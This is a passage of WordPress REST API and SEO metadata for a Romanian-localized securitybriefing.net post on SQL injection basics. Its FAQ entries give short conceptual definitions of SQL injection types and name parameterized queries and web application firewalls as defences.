Briefing\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81\",\"name\":\"security\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ro-RO\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g\",\"caption\":\"security\"},\"description\":\"admin is a senior staff writer for Government Technology. She previously wrote for PYMNTS and The Bay State Banner, and holds a B.A. in creative writing from Carnegie Mellon. She\u2019s based outside Boston.\",\"sameAs\":[\"http:\/\/securitybriefing.net\"],\"url\":\"https:\/\/securitybriefing.net\/ro\/author\/security\/\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\",\"position\":1,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\",\"name\":\"What is the most common SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"In-band SQL injection is the most common type of SQL injection attack. It occurs when an attacker can use the same communication channel to deliver the payload and gather results.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\",\"position\":2,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\",\"name\":\"What is the best defense of SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"The best defense against SQL injection is to use parameterized queries. This type of query uses placeholder values for parameters, which are supplied at a later date. This method allows the database to identify between source code and information.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\",\"position\":3,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\",\"name\":\"How is SQL injection detected?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"SQL injection can be detected in several ways. One method is to use a web application firewall (WAF). A WAF is a piece of hardware or software that sits between a web application and the internet. It inspects traffic for malicious activity and can block SQL injection attacks.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\",\"position\":4,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\",\"name\":\"What is second-order SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Second-order SQL injection occurs when an attacker can inject a payload that is stored by the web application and then later executed. This type of attack is more difficult to achieve because the attacker must have a way to trigger the execution of the stored payload.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\",\"position\":5,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\",\"name\":\"What is blind SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Blind SQL injection is an attack where the attacker does not directly see the results of their payload. Instead, they must use true or false statements to infer information from the database. This type of attack is more challenging to execute but can be just as dangerous as other types of SQL injection.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\",\"position\":6,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\",\"name\":\"What is a stacked query?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"A stacked query is a type of SQL injection where the attacker uses multiple queries to extract information from the database. This type of attack is more challenging to execute but can be very dangerous if successful.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\",\"position\":7,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\",\"name\":\"What is an error-based SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Error-based SQL injection is an attack where the attacker uses database errors to infer information from the database. This attack is more challenging to execute but can be very dangerous if successful.\",\"inLanguage\":\"ro-RO\"},\"inLanguage\":\"ro-RO\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ce este SQLi \u0219i cum s\u0103 prevenim atacurile | securitybriefing","description":"\u00cenva\u021b\u0103 bazele injec\u021biei SQL. Ce este injec\u021bia SQL, cum func\u021bioneaz\u0103 \u0219i ce modalit\u0103\u021bi exist\u0103 pentru a-\u021bi proteja site-ul de atacuri.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/","og_locale":"ro_RO","og_type":"article","og_title":"What is SQLi and How to Prevent Attacks | securitybriefing","og_description":"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.","og_url":"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/","og_site_name":"Security Briefing","article_published_time":"2022-08-06T22:53:54+00:00","og_image":[{"width":558,"height":500,"url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","type":"image\/png"}],"author":"security","twitter_card":"summary_large_image","twitter_misc":{"Scris de":"security","Timp estimat pentru citire":"11 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#article","isPartOf":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"},"author":{"name":"security","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81"},"headline":"SQL Injection 101: What is SQLi and How to Prevent Attacks","datePublished":"2022-08-06T22:53:54+00:00","mainEntityOfPage":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"},"wordCount":2130,"publisher":{"@id":"https:\/\/securitybriefing.net\/#organization"},"image":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","articleSection":["Security"],"inLanguage":"ro-RO"},{"@type":["WebPage","FAQPage"],"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/","url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/","name":"Ce este SQLi \u0219i cum s\u0103 prevenim atacurile | securitybriefing","isPartOf":{"@id":"https:\/\/securitybriefing.net\/#website"},"primaryImageOfPage":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"image":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","datePublished":"2022-08-06T22:53:54+00:00","description":"\u00cenva\u021b\u0103 bazele injec\u021biei SQL. Ce este injec\u021bia SQL, cum func\u021bioneaz\u0103 \u0219i ce modalit\u0103\u021bi exist\u0103 pentru a-\u021bi proteja site-ul de atacuri.","breadcrumb":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb"},"mainEntity":[{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814"}],"inLanguage":"ro-RO","potentialAction":[{"@type":"ReadAction","target":["https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"]}]},{"@type":"ImageObject","inLanguage":"ro-RO","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage","url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","contentUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","width":558,"height":500,"caption":"sql injection"},{"@type":"BreadcrumbList","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/securitybriefing.net\/"},{"@type":"ListItem","position":2,"name":"SQL Injection 101: What is SQLi and How to Prevent Attacks"}]},{"@type":"WebSite","@id":"https:\/\/securitybriefing.net\/#website","url":"https:\/\/securitybriefing.net\/","name":"Informare de Securitate","description":"Read cybersecurity news, online safety guides, cyber threat updates, and use free security tools from Security Briefing.","publisher":{"@id":"https:\/\/securitybriefing.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/securitybriefing.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ro-RO"},{"@type":"Organization","@id":"https:\/\/securitybriefing.net\/#organization","name":"Informare de Securitate","url":"https:\/\/securitybriefing.net\/","logo":{"@type":"ImageObject","inLanguage":"ro-RO","@id":"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/","url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png","contentUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png","width":256,"height":70,"caption":"Security Briefing"},"image":{"@id":"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81","name":"securitate","image":{"@type":"ImageObject","inLanguage":"ro-RO","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g","caption":"security"},"description":"admin este redactor senior pentru Government Technology. Anterior a scris pentru PYMNTS \u0219i The Bay State Banner \u0219i de\u021bine o diplom\u0103 de licen\u021b\u0103 \u00een scriere creativ\u0103 de la Carnegie Mellon. Ea locuie\u0219te \u00een afara Bostonului.","sameAs":["http:\/\/securitybriefing.net"],"url":"https:\/\/securitybriefing.net\/ro\/author\/security\/"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348","position":1,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348","name":"Care este cea mai comun\u0103 injec\u021bie SQL?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"In-band SQL injection is the most common type of SQL injection attack. It occurs when an attacker can use the same communication channel to deliver the payload and gather results.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832","position":2,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832","name":"Care este cea mai bun\u0103 ap\u0103rare \u00eempotriva injec\u021biei SQL?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"The best defense against SQL injection is to use parameterized queries. This type of query uses placeholder values for parameters, which are supplied at a later date. This method allows the database to identify between source code and information.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670","position":3,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670","name":"Cum este detectat\u0103 injec\u021bia SQL?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"SQL injection can be detected in several ways. One method is to use a web application firewall (WAF). A WAF is a piece of hardware or software that sits between a web application and the internet. It inspects traffic for malicious activity and can block SQL injection attacks.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103","position":4,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103","name":"Ce este injec\u021bia SQL de ordinul doi?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Second-order SQL injection occurs when an attacker can inject a payload that is stored by the web application and then later executed. This type of attack is more difficult to achieve because the attacker must have a way to trigger the execution of the stored payload.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267","position":5,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267","name":"Ce este injec\u021bia SQL oarb\u0103?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Blind SQL injection is an attack where the attacker does not directly see the results of their payload. Instead, they must use true or false statements to infer information from the database. This type of attack is more challenging to execute but can be just as dangerous as other types of SQL injection.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781","position":6,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781","name":"Ce este o interogare stivuit\u0103?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"A stacked query is a type of SQL injection where the attacker uses multiple queries to extract information from the database. This type of attack is more challenging to execute but can be very dangerous if successful.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814","position":7,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814","name":"Ce este un SQL injection bazat pe erori?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Error-based SQL injection is an attack where the attacker uses database errors to infer information from the database. This attack is more challenging to execute but can be very dangerous if successful.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"}]}},"_links":{"self":[{"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/posts\/505","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/comments?post=505"}],"version-history":[{"count":0,"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/posts\/505\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/media\/644"}],"wp:attachment":[{"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/media?parent=505"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/categories?post=505"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/securitybriefing.net\/ro\/wp-json\/wp\/v2\/tags?post=505"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}